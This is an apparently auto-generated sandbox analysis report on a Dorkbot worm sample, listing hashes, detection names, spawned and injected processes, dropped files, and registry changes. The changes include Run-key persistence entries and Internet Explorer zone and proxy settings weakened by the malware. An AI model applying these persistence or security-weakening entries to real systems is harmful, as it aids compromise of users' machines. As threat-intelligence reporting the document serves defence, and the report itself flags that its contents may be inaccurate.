Worm.Win32.Dorkbot_0507408aeb
Trojan.Win32.Yakes.fdil (Kaspersky), Gen:Variant.Graftor.144415 (B) (Emsisoft), Gen:Variant.Graftor.144415 (AdAware), Backdoor.Win32.Farfli.FD, Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, Sinowal.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericDownloader.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 0507408aeba6e089914234e07c5c820d
SHA1: 0176fd0f20f9884bec821083d91698255bae88f4
SHA256: 8ebd76d9305d5c702564a8791b2bdca49706e422d9ee37ae90b105abafee07aa
SSDeep: 1536:QPO20w4Ho0wPZYXpUsg/59Tf2OtavEtAtFFFFFFF5xWWAQ 53E/igGG:wBaUsC59Tf2uavEtAtFFFFFFF5sWDUUr
Size: 97792 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-14 21:16:31
Analyzed on: WindowsXP SP3 32-bit
Summary:
Worm. A program that is primarily replicating on networks or removable drives.
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
| MSNWorm | A worm can spread its copies through the MSN Messanger. |
| DNSBlocker | A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet. |
| UDPFlooder | This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
| SYNFlooder | This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
| Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
| USBInfector | A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer. |
Process activity
The Worm creates the following process(es):
ngggg.exe:1096
ngggg.exe:1596
ngggg.exe:912
calc.exe:3372
zthzjntzphj.exe:3036
%original file name%.exe:1984
dqqq.exe:180
vuxrwahifpa.exe:3788
vuxrwahifpa.exe:3272
vuxrwahifpa.exe:2984
bpihytyvgix.exe:2996
sppp.exe:3284
sppp.exe:2528
bett.exe:1580
bett.exe:1672
The Worm injects its code into the following process(es):
imapi.exe:1264
vmacthlp.exe:920
calc.exe:1160
notepad.exe:1520
svchost.exe:884
jqs.exe:348
winlogon.exe:708
services.exe:752
svchost.exe:948
svchost.exe:1016
svchost.exe:1100
svchost.exe:1148
svchost.exe:1192
spoolsv.exe:1440
Explorer.EXE:1912
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process ngggg.exe:1096 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe.gonewiththewings (0 bytes)
The process calc.exe:1160 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)
The process %original file name%.exe:1984 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (9505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bett.exe (62128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dq[1].exe (21775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe (12735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spm[1].exe (43891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ng[1].exe (33073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe (70237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (33910 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (0 bytes)
The process vuxrwahifpa.exe:3272 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bpihytyvgix.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vuxrwahifpa.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zthzjntzphj.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Application Data\c731200 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe.gonewiththewings (0 bytes)
The process bett.exe:1672 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
The Worm deletes the following file(s):
%Program Files%\Common Files\CreativeAudio\desktop.ini (0 bytes)
Registry activity
The process ngggg.exe:1096 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 2E B1 8F F1 7C 37 B6 2E B7 50 D2 C0 62 93 54"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process ngggg.exe:1596 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 A3 EE 4D 66 CC 58 BD C5 50 33 27 FA EE 17 32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process ngggg.exe:912 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 C7 48 65 58 B0 C5 57 59 1A 61 04 FC 52 10 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process calc.exe:1160 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 4F B3 5E CC 5D CC 76 9D 9B D0 4A D1 09 C3 BA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"1160" = "88 00 00 00 EC 09 00 00 8D F1 A2 00 4C 01 02 00"
The process calc.exe:3372 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 03 A1 40 04 7E 4A A4 0F CF 3C 26 4B 13 23 5C"
The process notepad.exe:1520 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F F1 6B CB 5F 10 56 81 D8 22 A9 A1 5B 49 BD 27"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process zthzjntzphj.exe:3036 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 76 11 6E F8 B4 CC A0 AF 6F 34 4C D6 18 AE DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process %original file name%.exe:1984 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 54 EE E7 C3 47 FC 22 8A 66 11 F2 AA EF 0F CB"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"1984" = "88 00 00 00 B4 04 00 00 8D F1 EB 00 EE 00 0C 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dqqq.exe:180 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 58 FD 8B E6 27 93 15 0E AF 5A 1D 04 A1 DE A8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"180" = "88 00 00 00 34 0A 00 00 8D F1 98 00 50 01 02 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process vuxrwahifpa.exe:3788 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 AF F4 AB 4E 64 74 6F A3 F4 24 E3 0A 80 F5 77"
The process vuxrwahifpa.exe:3272 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A EE 25 47 2B 02 77 C5 94 CB 87 F3 7D D4 95 C7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process vuxrwahifpa.exe:2984 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 3D 07 01 6E C4 B9 47 8A 60 27 41 B5 E9 78 71"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bpihytyvgix.exe:2996 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 07 71 EC BA 4C 91 51 E6 8F 20 64 C8 FE 80 35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process sppp.exe:3284 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 5A 26 2D 8E DE 48 E1 F7 73 DC 8A 73 16 9B 7C"
[HKCU\Software\VRTWatchdog]
"PerfData" = "31 30 30 36 36 34 39 36 33 33 33 35 31 32 35 35"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sppp.exe"
The process sppp.exe:2528 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA A6 E1 34 34 27 6E C1 04 CD 4A FF 2C 49 B6 BE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bett.exe:1580 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 0E 8D 6F 3B 0D 31 A2 E9 96 4D 2E 74 8D 5D 2B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process bett.exe:1672 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
